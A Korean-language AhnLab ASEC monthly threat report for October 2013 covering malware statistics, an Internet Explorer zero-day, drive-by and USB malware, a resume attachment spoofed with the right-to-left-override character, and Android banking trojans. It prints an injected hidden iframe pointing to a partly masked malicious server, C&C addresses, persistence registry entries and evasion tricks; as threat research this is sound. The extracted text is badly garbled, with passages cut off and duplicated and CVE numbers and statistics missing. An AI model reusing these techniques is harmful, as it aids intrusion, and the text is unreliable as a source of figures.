ASEC REPORT VOL

Size: px

Start display at page:

Download "ASEC REPORT VOL"

서규 증
5 years ago
Views:

1 ASEC REPORT VOL

2 CONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다. 자세한내용은안랩닷컴 ( 에서확인하실수있습니다 년 10 월보안동향 악성코드동향 01. 악성코드통계 03-10월, 신종악성코드대거출현 - 악성코드대표진단명감염보고최다 20-10월최다신종악성코드트로이목마 - 10월악성코드유형트로이목마가 56.2% - 악성코드유형별감염보고전월비교 - 신종악성코드유형별분포 02. 악성코드이슈 07 - IE 취약점 (MS13-080) 주의보! - 웹하드사이트에서유포된백도어악성코드발견 - 반복감염유발하는 USB 악성코드발견 - 일반사용자에게도유포된이력서첨부파일 - 화면보호기확장자 (.scr) 를이용한악성파일 03. 모바일악성코드이슈 16 - 모바일메신저피싱앱설치하는악성앱등장 - 암호화된안드로이드악성코드의등장 - 공공기관및기업사칭스미싱증가 보안동향 01. 보안통계 21-10월마이크로소프트보안업데이트현황 02. 보안이슈 22 - 스팸메일을발송하는다리미? - PHP.net 해킹으로인한악성코드유포 - DNS 하이재킹을통한홈페이지해킹 - 어도비해킹피해자, 3800만명으로증가웹보안동향 01. 웹보안통계 24 - 웹사이트악성코드동향 - 월별악성코드배포 URL 차단건수 - 월별악성코드유형 - 월별악성코드가발견된도메인 - 월별악성코드가발견된 URL - 악성코드유형별배포수

3 3 악성코드동향 01. 악성코드통계 10 월, 신종악성코드대거출현 ASEC 이집계한바에따르면, 2013 년 10 월에감염이보고된악성코드는 233 만 9014 건으로나타났 다. 이는전월 235 만 9753 건에비해 2 만 739 건이감소한수치다 ([ 그림 1-1]). 이중가장많이보고된 악성코드는 Win-Trojan/Patched.kg 이었으며, Textimage/Autorun 과 Als/Bursted 가다음으로많았다. 또한총 7 건의악성코드가최다 20 건목록에새로이름을올렸다 ([ 표 1-1]). 그림 1-1 월별악성코드감염보고건수변화추이 10,000,000 5,000, ,763,163 2,359,753 2,339, % 14.6% 0.88% 표 년 10월악성코드최다 20건 ( 감염보고, 악성코드명기준 ) 순위 등락 악성코드명 건수 비율 1 2 Win-Trojan/Patched.kg 366, % 2 Textimage/Autorun 96, % 3 4 Als/Bursted 85, % 4 NEW JS/Iframe 52, % 5 1 RIPPER 43, % 6 NEW Trojan/Win32.clicker 40, % 7 2 Win-Trojan/Wgames.Gen 36, % 8 Trojan/Win32.agent 31, % 9 NEW Win-Trojan/Agent , % 10 1 Win32/Autorun.worm F 27, % 11 1 ASD.PREVENTION 19, % 12 NEW Trojan/Win32.ankore 19, % 13 4 Trojan/Win32.Gen 19, % 14 NEW Trojan/Win32.onescan 17, % 15 1 Win-Trojan/Asd.variant 16, % 16 5 Win-Trojan/Malpacked5.Gen 15, % 17 2 Backdoor/Win32.plite 15, % 18 Win32/Virut.f 14, % 19 NEW Win32/Autorun.worm.Gen 13, % 20 NEW JS/Dldr 13, % TOTAL 976, %

4 4 악성코드대표진단명감염보고최다 20 [ 표 1-2] 는악성코드별변종을종합한악성코드대표진단명중가장많이보고된 20 건을추린것이다. 이중 Win-Trojan/Patched 가총 38 만 6061 건으로가장빈번히보고된것으로조사됐다. Trojan/Win32 는 24 만 7393 건, Win-Trojan/Agent 는 13 만 3541 건을각각기록해그뒤를이었다. 표 1-2 악성코드대표진단명최다 20건 순위 등락 악성코드명 건수 비율 1 3 Win-Trojan/Patched 386, % 2 1 Trojan/Win32 247, % 3 1 Win-Trojan/Agent 133, % 4 1 Textimage/Autorun 96, % 5 8 Als/Bursted 85, % 6 1 Win-Trojan/Onlinegamehack 60, % 7 NEW JS/Iframe 52, % 8 Win32/Conficker 50, % 9 Adware/Win32 48, % 10 Win32/Autorun.worm 47, % 11 4 Win-Trojan/Downloader 45, % 12 RIPPER 43, % 13 2 Win32/Virut 38, % 14 Win32/Kido 37, % 15 9 Win-Trojan/Wgames 36, % 16 1 Backdoor/Win32 25, % 17 NEW Win-Trojan/Avkiller 21, % 18 1 ASD 19, % 19 2 Malware/Win32 19, % 20 NEW Win-Trojan/Asd 16, % TOTAL 1,512, % 10월최다신종악성코드트로이목마 [ 표 1-3] 은 10 월에신규로접수된악성코드중감염보고가가장많았던 20 건을꼽은것이다. 10 월의신종악성코드는 Win-Trojan/Agent 이 3 만 1179 건으로전체의 63.2% 를차지했다. Exploit/Cve 은 5992 건으로 12.2% 를차지해그뒤를이었다. 표 월신종악성코드최다 20건 순위 악성코드명 건수 비율 1 Win-Trojan/Agent , % 2 Exploit/Cve , % 3 Win-Trojan/Agent P 1, % 4 Win-Trojan/Agent , % 5 VBS/Houdini 1, % 6 Win-Trojan/Onlinegamehack , % 7 Win-Trojan/Onlinegamehack , % 8 Win-Trojan/Onlinegamehack % 9 Win-Trojan/Urelas % 10 Win-Adware/Korad % 11 Win-Trojan/Agent % 12 Win-Trojan/Agent % 13 VBS/Dinihou % 14 Win-Trojan/Agent BPI % 15 Win-Trojan/Banki % 16 Win-Trojan/Onlinegamehack % 17 Dropper/Dapato % 18 Win-Trojan/Agent BN % 19 Win-Trojan/Agent RI % 20 Win-Adware/Korad % TOTAL 49, %

5 5 10월악성코드유형트로이목마가 56.2% [ 그림 1-2] 는 2013 년 10 월 1 개월간안랩고객으로부터감염이보고된악성코드의유형별비율을 집계한결과다. 트로이목마가 56.2% 로가장높은비율을나타냈고웜은 8.6%, 스크립트는 7.5% 의 비율을각각차지했다. 그림 1-2 악성코드유형별비율 악성코드유형별감염보고전월비교 [ 그림 1-3] 은악성코드유형별감염비율을전월과비교한것이다. 트로이목마, 웜, 스크립트, 스파 이웨어는전월에비해증가세를보인반면바이러스, 애드웨어, 익스플로이트, 드롭퍼, 다운로더는 감소했다. 애프케어계열은전월수준을유지했다. 그림 년 9 월 vs 년 10 월악성코드유형별비율

6 6 신종악성코드유형별분포 10 월의신종악성코드를유형별로살펴보면트로이목마가 83% 로가장많았고익스플로이트는 12%, 스크립트는 4% 로각각집계됐다. 그림 1-4 신종악성코드유형별분포

7 악성코드동향 02. 악성코드이슈 IE 취약점 (MS13-080) 주의보! 인터넷익스플로러 ( 이하 IE) 의보안취약점을통한악성코드유포및감염피해가보고돼사용자의주의가요구된다.

- http://technet.microsoft.com/ko-kr/security/bulletin/ms13-080 관련보안패치가배포되기전, 해당취약점을이용한제로데이 (Zero- Day) 공격이발견됐다.

gif) 을다운로드하며, 최종적으로사용자의시스템은온라인게임핵류의악성코드에감염된다. 그림 1-5 취약점코드가포함된스크립트해당코드에는윈도우XP 및 IE8.0을사용하는한국과일본사용자를타깃으로하는내용이확인됐다.

7 7 악성코드동향 02. 악성코드이슈 IE 취약점 (MS13-080) 주의보! 인터넷익스플로러 ( 이하 IE) 의보안취약점을통한악성코드유포및감염피해가보고돼사용자의주의가요구된다. 이와관련한피해를막기위해서는마이크로소프트 (MS) 가발표한 2013년 10월보안패치 (Microsoft Security Bulletin MS 긴급 ) 를적용해야한다. 또한 [ 그림 1-7] 과같이내부에백신의동작을방해하기위한정보도확인됐다. - 관련보안패치가배포되기전, 해당취약점을이용한제로데이 (Zero- Day) 공격이발견됐다. IE의 Use-After-Free 취약점 (CVE ) 이악용됐으며, 아래와같은스크립트를통해악성코드의유포및감염이이루어졌다. 그림 1-7 셸코드내백신관련스트링정보 감염된악성코드 (fird.gif) 는동일한서버로부터아래와같이추가로악성파일 (firw.gif) 을다운로드하며, 최종적으로사용자의시스템은온라인게임핵류의악성코드에감염된다. 그림 1-5 취약점코드가포함된스크립트해당코드에는윈도우XP 및 IE8.0을사용하는한국과일본사용자를타깃으로하는내용이확인됐다. 해당취약점을통해인코딩된셸코드가실행되면, [ 그림 1-6] 과같이추가적인악성파일이다운로드및실행된다. 그림 1-8 추가적인파일다운로드정보해당악성코드로인한감염피해를막기위해서는즉시 MS의보안패치를적용해야한다. 또한잠재적인보안위협으로부터시스템과자산을보호하기위해서는 OS 및주요응용프로그램관련보안업데이트를즉시적용해야한다. V3 제품에서는아래와같이진단이가능하다. 그림 1-6 셸코드내스트링정보 <V3 제품군의진단명 > Exploit/Cve Trojan/Win32.OnlineGameHack Dropper/Win32.Injector

8 웹하드사이트에서유포된백도어악성코드발견최근인터넷사용자들이많이접속하는웹하드사이트에서백도어악성코드가유포돼사용자의주의가요구된다.

그림 1-9 악성코드가유포된사이트 사용자가해당사이트를방문하면웹페이지에삽입된악성스크립트가호출되고취약점을통해악성코드에감염된다.

<iframe height=1 width=100 Src=http://222.***.2.57/adx/ad.

8 8 웹하드사이트에서유포된백도어악성코드발견최근인터넷사용자들이많이접속하는웹하드사이트에서백도어악성코드가유포돼사용자의주의가요구된다. 이번에발견된악성코드는자바 (JAVA) 취약점을이용해유포됐다. 해당악성코드의감염을예방하기위해서는최신보안패치를적용해야한다. 해당웹사이트에서유포된악성코드는또다른웹하드사이트에서도동일하게발견됐다. 악성코드제작자는방문자가많은웹하드사이트를중심으로악성코드를유포한것으로추정된다. 난독화를해제하면자바취약점파일과악성코드유포 URL을확인할수있다. 그림 1-12 난독화해제 악성코드 svchsot.exe는 [ 그림 1-13] 과같은경로에생성되며윈도우시작시자동으로실행되도록시작레지스트리에등록된다. 그림 1-9 악성코드가유포된사이트 사용자가해당사이트를방문하면웹페이지에삽입된악성스크립트가호출되고취약점을통해악성코드에감염된다. 그림 1-13 취약점을통해생성된악성코드해당악성코드는백도어악성코드로매시간실행되도록예약작업에등록된다. 특정서버에연결을시도할것으로추정되지만분석당시에는확인되지않았다. 그림 1-10 웹페이지에삽입된악성스크립트 웹페이지에삽입된스크립트를디코딩하면아래와같은 iframe을확인할수있다. <iframe height=1 width=100 Src= <iframe height=1 width=100 Src= 해당웹페이지는공다팩 (Gongda Pack) 툴킷으로내부코드가난독화돼있다. 그림 1-14 예약작업등록정보 V3 제품에서는관련악성코드를아래와같이진단한다. <V3 제품군의진단명 > Trojan/JAVA.CVE JS/Exploit ( ) Backdoor/Win32.Agent ( ) 그림 1-11 악성 HTML 파일

9 반복감염유발하는 USB 악성코드발견 autorun.inf 파일은 USB, 외장하드등이동식저장장치의루트폴터에위치해파일에연결된장치등을실행하는기능으로이동식저장장치의사용을편리하게한다. [ 그림 1-15] 는최근발견된악성코드에감염된 USB의루트폴더이다. Trashs 폴더와바로가기파일, 그리고무작위문자열파일등이보이는데, 이상한점은 autorun.

**0:80 (ap*.wi*****a.com) 그림 1-15 숨김설정되어있는정상파일과폴더해당악성코드에감염되면 [ 그림 1-15] 와같은파일들이생성된다. 그리고바로가기파일 (.Trashes, Test) 의속성을확인해보면 [ 그림 1-16] 과같이악성코드파일을실행하도록지정된것을알수있다. 해당악성코드에감염되면 PC와 USB를동시에치료해야한다.

정상적으로숨김속성이해제되었는지확인한다. 해당악성코드에감염되는것을예방하기위해서는아래와같은사항을준수한다. 1. V3에서제공하는 [CD/USB 드라이브자동실행방지 ] 기능을사용한다. [ 환경설정 ] - [ 고급설정 ] - [CD/USB 드라이브자동실행방지 ] 체크 2. V3에서제공하는 [USB 드라이브자동검사하기 ] 기능을사용한다.

9 9 반복감염유발하는 USB 악성코드발견 autorun.inf 파일은 USB, 외장하드등이동식저장장치의루트폴터에위치해파일에연결된장치등을실행하는기능으로이동식저장장치의사용을편리하게한다. [ 그림 1-15] 는최근발견된악성코드에감염된 USB의루트폴더이다. Trashs 폴더와바로가기파일, 그리고무작위문자열파일등이보이는데, 이상한점은 autorun.inf 파일이보이지않는다는점이다. 악성코드에감염되면서 [ 그림 1-17] 과같이레지스트리영역을수정해, 서비스와시작프로그램에등록한다. 그림 1-17 레지스트리를수정해서비스와시작프로그램에등록 해당악성코드는감염되면서그림판프로세스 (mspaint.exe) 에인젝션되어실행되는데, 아래와같은네트워크로의연결을시도한다. [ 연결되는네트워크정보 ] 21*.2**.***.**0:80 (ap*.wi*****a.com) 그림 1-15 숨김설정되어있는정상파일과폴더해당악성코드에감염되면 [ 그림 1-15] 와같은파일들이생성된다. 그리고바로가기파일 (.Trashes, Test) 의속성을확인해보면 [ 그림 1-16] 과같이악성코드파일을실행하도록지정된것을알수있다. 해당악성코드에감염되면 PC와 USB를동시에치료해야한다. 그렇지않을경우지속적인재감염이발생하기때문이다. 악성코드치료시모든폴더가숨김으로되어있는경우, 아래와같이진행한다. 1. 루트폴더에서모든파일 / 폴더를선택하고, 우클릭후속성을선택한다. 2. [ 확인 ] 버튼상단에존재하는 [ 숨김 (H)] 체크박스를해제한다. 3. [ 확인 ] 버튼을누르면새로운창이뜨는데, [ 현재폴더, 하위폴더및파일에적용 ] 을선택한다. 4. 정상적으로숨김속성이해제되었는지확인한다. 해당악성코드에감염되는것을예방하기위해서는아래와같은사항을준수한다. 1. V3에서제공하는 [CD/USB 드라이브자동실행방지 ] 기능을사용한다. [ 환경설정 ] - [ 고급설정 ] - [CD/USB 드라이브자동실행방지 ] 체크 2. V3에서제공하는 [USB 드라이브자동검사하기 ] 기능을사용한다. [ 환경설정 ] - [ 고급설정 ] - [USB 드라이브자동검사하기 ] 체크 그림 1-16 악성코드를실행하도록지정된바로가기파일 3. V3 를최신엔진으로업데이트하고, 실시간감시기능을사용한다. 4. 윈도우보안업데이트및각종프로그램을최신버전으로업데이트한다. 이번에발견된악성코드는아래의경로에파일을생성한다. [ 생성파일경로 ] C:\WINDOWS\system32\inf\svchost.exe C:\Documents and Settings\Administrator\Application Data\ temp.bin C:\Documents and Settings\Administrator\Application Data\ ScreenSaverPro.scr C:\Documents and Settings\Administrator\Application Data\ Microsoft\Bxiuiv.exe USB저장장치 \1760f7df.pif USB저장장치 \enldaunjsbegmne.exe V3 제품에서는해당악성코드를아래와같이진단한다. <V3 제품군의진단명 > Trojan/Win32.Downloader ( ) Win-Trojan/Pcclient ( ) LNK/Autorun ( ) 일반사용자에게도유포된이력서첨부파일최근이력서파일을첨부한스팸메일이기업의인사담당자가아닌포털사이트의웹메일을이용하는일반사용자에게도유포되고있는것

10 으로확인됐다. 아래 [ 그림 1-18] 은기존에발견된이력서첨부스팸메일의사례다. 해당메일의내용은영문으로작성됐으며아이콘은 MS워드문서파일의모양을하고있지만, 실제확장자는.exe의실행파일이다. 또한실제워드파일 (MS Office 2007) 과다른아이콘을하고있으며, 그모양도매끄럽지않다.

docx로정상적인문서파일의형태를하고있어사용자들은별다른의심없이해당파일을실행하기쉽다. 또한메일내용및첨부파일이모두한글로돼있어국내사용자들의각별한주의가요구된다. 실제로이번사례의신고자는 취업준비시절, 구직사이트에이력정보를등록한적이있어이력서메일이잘못발송된것이라생각하고해당파일을열었다 " 고말했다.

$[ 파일생성 ] CREATE C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ RarSFX0\ccxjepib9aj53nna.exe CREATE C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ RarSFX0\ 이나주이력서.$ exe( 악성파일 ) 에의한네트워크연결정보 그림 1-19 확장자가.docx(MS워드) 인악성파일이때확장자는.docx인데실제파일이실행파일인이유는 Unicode Character 'RIGHT-TO-LEFT OVERRIDE' (U+202E) 때문이다.

exe( 악성파일 ) 에의한네트워크연결정보 그림 1-19 확장자가.docx(MS워드) 인악성파일이때확장자는.docx인데실제파일이실행파일인이유는 Unicode Character 'RIGHT-TO-LEFT OVERRIDE' (U+202E) 때문이다.

10 10 으로확인됐다. 아래 [ 그림 1-18] 은기존에발견된이력서첨부스팸메일의사례다. 해당메일의내용은영문으로작성됐으며아이콘은 MS워드문서파일의모양을하고있지만, 실제확장자는.exe의실행파일이다. 또한실제워드파일 (MS Office 2007) 과다른아이콘을하고있으며, 그모양도매끄럽지않다. 그림 1-20 U+202E(RTLO) 유니코드를이용한확장자변조 ( 콘솔확인 ) 해당메일에첨부된악성파일에감염시생성되는악성파일은아래와같다. 그림 1-18 기존의이력서 ( 악성파일 ) 첨부스팸메일하지만이번에발견된사례는, 이력서첨부파일의확장자가.docx로정상적인문서파일의형태를하고있어사용자들은별다른의심없이해당파일을실행하기쉽다. 또한메일내용및첨부파일이모두한글로돼있어국내사용자들의각별한주의가요구된다. 실제로이번사례의신고자는 취업준비시절, 구직사이트에이력정보를등록한적이있어이력서메일이잘못발송된것이라생각하고해당파일을열었다 " 고말했다. [ 그림 1-19] 의첨부된파일을확인해보면확장자가.docx로파일의속성을확인하면응용프로그램 (.exe) 인것을확인할수있다. 아이콘도실제문서파일과동일해사용자가쉽게알아차리지못하도록했다. [ 파일생성 ] CREATE C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ RarSFX0\ccxjepib9aj53nna.exe CREATE C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ RarSFX0\ 이나주이력서.docx 위와같은악성 PE 파일이외에도 %temp% 내특정폴더안에정상적인이력서워드문서파일을생성해사용자에게정상파일로보이도록위장한다. 또한생성된 Server.exe 악성파일에의해특정 C&C서버로 TCP SYN을주기적으로보내는행위를하며, 이에따른추가적인위협이발생할수있다. 그림 1-21 Sever.exe( 악성파일 ) 에의한네트워크연결정보 그림 1-19 확장자가.docx(MS워드) 인악성파일이때확장자는.docx인데실제파일이실행파일인이유는 Unicode Character 'RIGHT-TO-LEFT OVERRIDE' (U+202E) 때문이다. 이는유니코드의문자셋표현방법중하나로, 보통글자는왼쪽에서부터오른쪽으로쓰지만위와같은표현기법을이용하면반대로쓰이게된다. 즉 xcod.exe 라고입력한후이표현식을적용하면 exe. docx 가되는것이다. [ 그림 1-20] 과같이콘솔에서확인하면, 문자셋표현이적용되지않는원래의파일명을확인할수있다. 최근문서프로그램의취약점을겨냥하는사례가급증하고있다. 출처가불분명한이메일에첨부된문서는함부로실행하지않아야하며취약점이존재하는소프트웨어는반드시최신패치를적용해야한다. V3 제품에서는해당악성코드를아래와같이진단한다. <V3 제품군의진단명 > Trojan/Win32.Zbot ( ) Dropper/Agent ( ) Win-Trojan/Agent ( )

11 11 화면보호기확장자 (.scr) 를이용한악성파일최근 new_purchase_order_14_oct_2013 의제목으로비슷한유형의악성스팸메일이다수기업에유입되고있어사용자들의주의가필요하다. 이들악성스팸메일의첨부파일명은 PurchaseOrder1October 2013.scr 로, 화면보호기 ( 스크린세이버 ) 확장자인.scr을사용한것이특징이다..scr 확장자는실행파일로더블클릭시.exe처럼실행되어악성코드에감염된다. 해당스팸메일의본문내용은아래와같다. 분석당시서버로의접근이이루어지지않아특별한악성행위는확인되지않았지만, C&C로추정되는서버가복구되면언제든지다시악성행위를시작할수있으므로악성파일은발견시바로치료해주는습관이필요하다. 해당악성코드는 V3제품을통해진단및치료가가능하다. <V3 제품군의진단명 > Trojan/Win32.Zbot (AhnLab, ) Subject: new_purchase_order_14_oct_2013 Please refer to the appendix to accept our new POs & for Nov/Dec shipment. Please accept our prices in the lists, and note, Our requested shipping date is 1st week of Dec/2013. Pls confirm, thank you. Awaiting your order confirmation yours sincerely, 첨부된악성파일은 [ 그림 1-22] 와같이문서아이콘을사용하고있어사용자가문서로판단하기쉽지만실제로는.scr의실행파일이다. 그림 1-22 문서아이콘으로위장한악성첨부파일 위악성코드는실행시아래와같이동작한다. 1. iexplore.exe와 notepad.exe 실행 2. notepad.exe에 thread injection하여악의적인기능수행 - 아래의경로에 office로위장해자기복제본생성 C:\Documents and Settings\Administrator\Application Data\office12\office.exe - Run 레지스트리에등록하여자동실행유도 HKCU\Software\Microsoft\Windows\CurrentVersion\ Run\{KL7890-IOP1223MO-PO022-MNUEYU} "C:\Documents and Settings\Administrator\Application Data\office12\office.exe" 3. iexplore.exe에 thread injection하여아래의서버로주기적인통신 ( 현재는접속불가 ) :1982

12 악성코드동향 03. 모바일악성코드이슈 그림 1-25 악성앱실행화면 모바일메신저피싱앱설치하는악성앱등장최근유명모바일메신저앱을삭제하고이를사칭한피싱앱설치를유발하는악성앱이발견됐다.

설치된악성앱의아이콘모양만봤을때는정상여부를확인하기어렵다. 그림 1-26 설치된피싱앱실행화면 그림 1-23 악성앱아이콘모양 해당악성앱실행시에는앱아이콘이삭제되면서아래와같이휴대폰기기관리자활성화설정화면이나타난다.

완료 버튼을누르면앱이종료되고, 다시앱을실행하면시스템점검중이라는메시지와함께앱이종료된다. 해당앱역시기기관리자활성화를요구한다. 해당악성코드는 V3 Mobile 제품을통해진단및치료가가능하다.

02) Android-Trojan/Bankun.B6E91 (2013.10.23.

12 12 악성코드동향 03. 모바일악성코드이슈 그림 1-25 악성앱실행화면 모바일메신저피싱앱설치하는악성앱등장최근유명모바일메신저앱을삭제하고이를사칭한피싱앱설치를유발하는악성앱이발견됐다. [ 그림 1-23] 과같이피싱앱설치를유도하는악성앱의아이콘모양은정상앱인 Play 스토어 아이콘과유사하지만앱이름이존재하지않는다. 이때업데이트를하면정상메신저앱을삭제하고또다른악성앱이설치된다. 설치된악성앱의아이콘모양만봤을때는정상여부를확인하기어렵다. 그림 1-26 설치된피싱앱실행화면 그림 1-23 악성앱아이콘모양 해당악성앱실행시에는앱아이콘이삭제되면서아래와같이휴대폰기기관리자활성화설정화면이나타난다. 악성앱을실행하면 [ 그림 1-26] 과같이사용자의주민등록번호, 이름등의입력을요구한다. 개인정보입력후에는업데이트가정상적으로완료됐다는메시지가나타난다. 완료 버튼을누르면앱이종료되고, 다시앱을실행하면시스템점검중이라는메시지와함께앱이종료된다. 해당앱역시기기관리자활성화를요구한다. 해당악성코드는 V3 Mobile 제품을통해진단및치료가가능하다. <V3 Mobile의진단명 > Android-Dropper/Bankun.B6E90 ( ) Android-Trojan/Bankun.B6E91 ( ) 암호화된안드로이드악성코드의등장 그림 1-24 기기관리자활성화설정화면 [ 그림 1-24] 에서 활성화 버튼을터치하면해당악성앱은서비스로등록되어실행되고 BroadcastReceiver가동작하면서기기의특정행위를감시한다. 기기를재부팅하면아래와같이유명모바일메신저앱관련업데이트가알림으로나타난다. 스미싱을통해암호화된안드로이드악성코드가발견됐다. 일반적으로는스마트폰에설치되지않아야하지만해당악성코드는정상적으로설치됐다. 안드로이드에서동작하는애플리케이션은 APK(Android application package) 라는확장자를가진다. APK는일반적으로널리사용되는 ZIP이라는압축파일의형식을그대로사용하고있다. 따라서 [ 그림 1-27] 과같이일반적인압축프로그램으로 APK를열어보면어떤파일들로구성돼있는지확인할수있다.

13 하지만안드로이드를운영체제로사용하는스마트폰에서는비밀번호를입력하지않고도해당애플리케이션을설치할수있다.

1-28] 과같이암호화기능을사용해비밀번호를정확하게입력해야만해제할수있는압축파일을생성할수있다.

이헤더값중 General purpose bit flag의값이 1로설정되어있으면해당파일은암호화돼있다고판단,

정상적으로암호화된 ZIP 파일이라면추가로생성된다음의구조체 ([ 그림 1-32])

그림 1-29 압축해제를위해비밀번호입력 그림 1-32 암호화된 ZIP 해제를위한구조체

과같이해제하려면비밀번호를입력해야한다. 이때비밀번호를입력하지않으면정상적으로압축된파일을해제할수없다.

13 13 하지만안드로이드를운영체제로사용하는스마트폰에서는비밀번호를입력하지않고도해당애플리케이션을설치할수있다. 그림 1-27 압축프로그램으로일반적인 APK 파일을열었을경우 일반적인 ZIP 압축의경우, [ 그림 1-28] 과같이암호화기능을사용해비밀번호를정확하게입력해야만해제할수있는압축파일을생성할수있다. 그림 1-31 비밀번호없이정상설치되는암호화된 APK ZIP 파일은압축된파일각각에대한헤더를갖고있다. 이헤더값중 General purpose bit flag의값이 1로설정되어있으면해당파일은암호화돼있다고판단, 비밀번호를확인한후일치할경우에만압축을해제한다. 정상적으로암호화된 ZIP 파일이라면추가로생성된다음의구조체 ([ 그림 1-32]) 를참조해비밀번호검증및압축해제를수행한다. 그림 1-28 비밀번호를이용한암호화압축 이렇게생성된암호화된 ZIP 형식의파일은반드시압축파일을생성할때입력했던비밀번호와동일한비밀번호를입력해야한다. 그림 1-29 압축해제를위해비밀번호입력 그림 1-32 암호화된 ZIP 해제를위한구조체 이번에발견된악성코드도이렇게암호화된 ZIP 형식으로되어있어 [ 그림 1-30] 과같이해제하려면비밀번호를입력해야한다. 이때비밀번호를입력하지않으면정상적으로압축된파일을해제할수없다. 즉암호화된 ZIP 파일의압축해제를위해서는추가로최소한 26바이트이상의데이터가있어야한다. 하지만이번에발견된악성코드를살펴보면 General purpose bit Flag에 1이값으로설정되어있지만, 압축해제를위한 Extra field의크기는 4로확인됐다. 즉압축해제를위한필수적인데이터가존재하지않는것이다. 그림 1-33 암호화된 ZIP 형태의악성코드헤더 그림 1-30 악성코드의내용을보려면비밀번호입력필요

14 실제압축된데이터를보면 ZIP의표준압축방식인 deflate로압축돼있으며 General purpose bit flag를조작해일반압축프로그램에서는내용을볼수없도록 APK 파일을조작했다. 안드로이드운영체제의애플리케이션설치관리자는암호화된 ZIP을고려하지않아 General purpose bit flag를무시하고 deflate로압축된데이터를해제해정상설치된다.

한편이렇게설치된악성코드는사용자스마트폰의정보와스마트폰에저장돼있는주소록정보를외부로유출하며수신되는전화와문자 (SMS) 내역을가로챈다. 또한설치되어있는뱅킹앱을제거하고공격자가원하는악성코드로재설치하도록유도하는기능을갖고있다.

그림 1-34 악성코드설치를유도하는코드 해당악성코드는 V3 Mobile 제품을통해진단및치료가가능하다. <V3 Mobile의진단명 > Android-Trojan/Chest 공공기관및기업사칭스미싱증가스마트폰사용자를타깃으로금전적이득을취하려는악성앱과개인정보를포함한인터넷뱅킹정보를탈취하려는악성앱이끊임없이발견되고있다.

14 14 실제압축된데이터를보면 ZIP의표준압축방식인 deflate로압축돼있으며 General purpose bit flag를조작해일반압축프로그램에서는내용을볼수없도록 APK 파일을조작했다. 안드로이드운영체제의애플리케이션설치관리자는암호화된 ZIP을고려하지않아 General purpose bit flag를무시하고 deflate로압축된데이터를해제해정상설치된다. 일반적으로악성코드는보안제품에의해탐지되는시간이지연될수록원하는목적을달성할가능성이높아진다. 따라서보안분석가나분석시스템에서해당악성코드를암호화된 ZIP 파일로인식해분석대상에서제외하거나분석시간을더걸리게해악성코드가보다오랫동안진단되지않도록하기위한것으로보인다. 한편이렇게설치된악성코드는사용자스마트폰의정보와스마트폰에저장돼있는주소록정보를외부로유출하며수신되는전화와문자 (SMS) 내역을가로챈다. 또한설치되어있는뱅킹앱을제거하고공격자가원하는악성코드로재설치하도록유도하는기능을갖고있다. 그림 1-35 공공기관및기업의대표번호도용사례한국인터넷진흥원은공공기관, 금융기업및일반기업의전화번호사칭피싱을차단하기위해해당기관및기업에서차단을원하는전화번호를등록하도록해스미싱에악용되지않도록하는피싱대응센터를운영하고있다. 한국인터넷진흥원에서운영하고있는피싱대응센터의주소는 이다. 그림 1-34 악성코드설치를유도하는코드 해당악성코드는 V3 Mobile 제품을통해진단및치료가가능하다. <V3 Mobile의진단명 > Android-Trojan/Chest 공공기관및기업사칭스미싱증가스마트폰사용자를타깃으로금전적이득을취하려는악성앱과개인정보를포함한인터넷뱅킹정보를탈취하려는악성앱이끊임없이발견되고있다. 악성앱제작자는지능적인방법을이용해사용자의악성앱설치를유도하고있는데, 그방법중하나는신뢰할수있는유명기업이나공공기관의전화번호를도용해메시지를발송하는것이다. 유명기업이나공공기관의대표번호를도용하는이유는이미스마트폰의수신함에해당번호로수신된메시지가존재할가능성이높기때문이다. 이경우사용자는해당기업에서발송한메시지로오인해악성앱을설치할가능성이높아진다. [ 그림 1-35] 는공공기관및기업의대표번호를도용한사례다. 그림 1-36 한국인터넷진흥원피싱대응센터위의사례이외에도다양한스미싱사례가급증하고있다. 기관, 기업, 단체사칭은물론이고실명과주민등록번호까지메시지에포함되어있기때문에사용자의더욱세심한관심이필요하다. 스미싱피해를최소화하기위해서는아래의사항을참고하면유용하다. 1) SNS(Social Networking Service) 나문자메시지에포함된 URL 실행주의 2) 모바일백신으로앱설치전검사 3) 알수없는출처 ( 소스 ) 의허용금지설정 4) 스미싱탐지전용앱설치안랩은이러한스미싱피해를예방하기위해최근스미싱탐지앱 AhnLab 안전한문자를출시했다. 안전한문자는실시간 URL 실행감지기능이포함되어있어효과적인스미싱차단이가능하다. 안전한문자는출시열흘만에약 5만건이다운로드되는등사용자의호평을받고있으며현재구글플레이를통해무료로제공되고있다.

15 ASEC REPORT 46 SECURITY TREND 15 보안동향 01. 보안통계 10월마이크로소프트보안업데이트현황 2013 년 10 월마이크로소프트 (MS) 에서발표한보안업데이트는총 8 건으로긴급 4 건, 중요 4 건이었 다. 특히인터넷익스플로러는누적보안업데이트로다수의취약점들에대한패치가포함돼있으므 로안전한인터넷사용을위해서반드시보안패치를적용해야한다. 그림 2-1 공격대상기준별 MS 보안업데이트 긴급 MS Internet Explorer 누적보안업데이트 MS Windows 커널모드드라이버의취약점으로인한원격코드실행문제점 MS NET Framework의취약점으로인한원격코드실행문제점 MS Windows 공용컨트롤라이브러리의취약점으로인한원격코드실행문제점중요 MS Microsoft SharePoint Server의취약점으로인한원격코드실행문제점 MS Microsoft Excel의취약점으로인한원격코드실행문제점 MS Microsoft Word의취약점으로인한원격코드실행문제점 MS Silverlight의취약점으로인한정보유출문제점표 년 10월주요 MS 보안업데이트

ASEC REPORT 46 SECURITY TREND 16 보안동향 02. 보안이슈 스팸메일을발송하는다리미? 러시아국영방송 Rossiya 24 는지난 10월 29일일부중국산다리미에서 Wi-Fi 네트워크를이용해스팸메일을발송하는장치가발견돼수입을취소했다고전했다.

uk/news/blogs-news-from-elsewhere-24707337 공격자들이 SSL 인증서개인키에접근했을가능성이있어 site의인증서를폐기하고새로발급받을것이라고밝혔다. 그림 2-3 PHP.net 에올라온사고내용 방송동영상 : http://www.youtube.com/watch?

